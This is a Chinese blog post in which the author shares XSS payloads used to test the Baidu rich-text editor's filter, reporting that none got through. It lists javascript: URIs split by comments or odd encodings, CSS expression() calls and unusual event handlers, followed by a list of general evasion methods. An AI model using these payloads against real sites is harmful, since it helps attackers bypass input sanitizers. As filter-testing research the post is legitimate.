测试百度XSS Filter的一些例子
来源:大风起兮云飞扬
今天有朋友和我讨论了一下关于百度富文本编辑器 XSS Filter的问题,关于过滤规则可以看我之前在WoBB的终章里总结的8条规则。
这里我可以把我测试XSS Filter的部分html发一下,希望能帮助到某些朋友。(当然我最终还是没绕过去)
如下:
<img src=”java/*/*javascript*/script/*javascript*/*/script:alert();” >
<img src=”java/*/*javascript*/java/*javascript*/script/*javascript*/*/script:alert();” >
<img src=”java/*java/*javascript*/1script*/script:alert();”>
<img src=”java/*script:alert();”><img src=”javaa*/script:alert();”>
<img src=”java/*exp/**/script:alert();*/ression(alert(1))”>
<img style=”width: exp/*ression(alert());” src=”java/*exp/**/script:alert();*/ression(alert(1))”>
<!–[if IE]><![endif]–>
<img src=”java/*javascript*/script java\script:alert();”>
<img src=”java/*javascript*/1script/*><x src=javascript:alert();”>
<img src=”java/*java/*javascript*/1script*/script:alert();/*><x fvck=java/*style=\java*/script:alert();>
<img src=”java/*java/*<a fvck=’java/*style=\java*/script:alert();’>*/1script*/script:alert();”>
<img src=”java/*java <a href=’/*java/*style=\java*/script:alert();’>*/script:alert(); > ”
<img src=<java/*<<a>>*/scrip >>
<a style=”background-image: url(@import \’ fvck\’) ” >
<img onbeforeupdate=”fvck” ondataavailable=”fvck” onrowsdelete=”fvck” onrowsinserted=”fvck” />
<img src=”java/*ssss%c1*/script:alert();*/”>
<img src=”java/*sssss%c1*/%c1/*script:alert();*/script:alert();”>
<img src=”java/*java <a href=’java/*java/*style=%c1\java%c1*/script:alert();’>*/script:alert(); > “>
<img src=”javascript:alert();”>
%ef’);alert();(
<img src=”j%c1%26;javascript:alert();” >
<img src=”java/*xxxx%81*/script:alert();” >
嘿嘿。。。过几天看篇文章,或许对你有帮助。。。
现在文章没发布。。。嘿嘿。。。作者注意浏览鬼子的blog哦。。。
躲避方法1)在javascript中加入多个tab键,得到
;
躲避方法2) 在javascript中加入	编码字符,得到
;
躲避方法3) 在javascript中加入
字符,得到
;
躲避方法4)在javascript中的每个字符间加入回车换行符,得到
躲避方法5)对”javascript:alert(‘XSS’)”采用完全编码,得到
alert(“lxai”)
alert(‘test’);